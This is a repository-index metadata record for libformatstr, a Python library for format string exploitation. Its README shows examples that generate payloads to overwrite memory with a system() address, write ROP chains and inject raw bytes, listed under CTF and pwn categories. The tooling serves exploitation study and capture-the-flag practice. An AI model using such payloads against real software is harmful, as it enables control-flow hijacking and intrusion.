{"id":13395918,"url":"https://github.com/hellman/libformatstr","last_synced_at":"2025-04-11T21:38:57.330Z","repository":{"id":46284230,"uuid":"3213035","full_name":"hellman/libformatstr","owner":"hellman","description":"Simplify format string exploitation.","archived":false,"fork":false,"pushed_at":"2021-11-02T09:15:14.000Z","size":19,"stargazers_count":338,"open_issues_count":5,"forks_count":37,"subscribers_count":16,"default_branch":"master","last_synced_at":"2025-04-04T11:05:52.412Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hellman.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2012-01-18T22:19:06.000Z","updated_at":"2025-02-22T22:21:15.000Z","dependencies_parsed_at":"2022-09-22T19:41:23.456Z","dependency_job_id":null,"html_url":"https://github.com/hellman/libformatstr","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hellman%2Flibformatstr","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hellman%2Flibformatstr/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hellman%2Flibformatstr/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hellman%2Flibformatstr/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hellman","download_url":"https://codeload.github.com/hellman/libformatstr/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248485396,
"owners_count":21111848,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-30T18:00:35.570Z","updated_at":"2025-04-11T21:38:57.297Z","avatar_url":"https://github.com/hellman.png","language":"Python","readme":"libformatstr.py\n====================\n\nSmall script to simplify format string exploitation.\n\nUsage\n---------------------\n\n* Case 1 - replace one dword:\n\n```python\nimport sys\nfrom libformatstr import FormatStr\n\naddr = 0x08049580\nsystem_addr = 0x080489a3\n\np = FormatStr()\np[addr] = system_addr\n\n# buf is the 14th argument, 4 bytes are already printed\nsys.stdout.write( p.payload(14, start_len=4) )\n```\n\n* Case 2 - put ROP code somewhere:\n\n```python\nimport sys\nfrom libformatstr import FormatStr\n\naddr = 0x08049580\nrop = [0x080487af, 0x0804873c, 0x080488de]\np = FormatStr()\np[addr] = rop\n\nsys.stdout.write( p.payload(14) )\n```\n\n* Case 3 - guess argument number and padding:\n\n```python\nimport sys\nfrom libformatstr import FormatStr\n\n# let's say we have a do_fmt function,\n# which gives us only the output of the format string\n# (you can also just copy fmtstr and output manually)\n\nbuf_size = 250  # fix buf_size to avoid offset variation\nres = do_fmt(make_pattern(buf_size))\nargnum, padding = guess_argnum(res, buf_size)\n\n# of course you can use it in payload generation\n\np = FormatStr(buf_size)\np[0xbffffe70] = \"\\x70\\xfe\\xff\\xbf\\xeb\\xfe\"  # yes, you can also put strings\n\nsys.stdout.write( p.payload(argnum, padding, 3) ) # we know 3 bytes were printed already\n```\n\n* Case 4 - write something in a specified order:\n\n```python\nfrom libformatstr import FormatStr\nf=FormatStr(autosort=False) # This option disables auto sorting\nf[0x1234]=0x1\nf[0x5678]=0x2\nf[0xabcd]=0x3\n\n# The payload will write address 0x1234 first, then 0x5678, then 0xabcd.\n```\n\n* Case 5 - when targeting amd64:\n\n```python\nfrom libformatstr import FormatStr\nf=FormatStr(isx64=1) # This option forces the script to use 64-bit addresses when generating the payload\nf[0x1234]=0x1\nf[0x5678]=0x2\nf[0xabcd]=0x3\n```\n\nAbout\n---------------------\n\nAuthor: hellman ( hellman1908@gmail.com )\n\nLicense: MIT License ( http://opensource.org/licenses/MIT )\n","funding_links":[],"categories":["[*] System hacking / Pwnable","Exploiting / Pwn","Exploits","Programming/Comp Sci/SE Things"],"sub_categories":["[+] TIP \u0026 Tools  :+1:","Exploitation/PWN"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhellman%2Flibformatstr","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhellman%2Flibformatstr","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhellman%2Flibformatstr/lists"}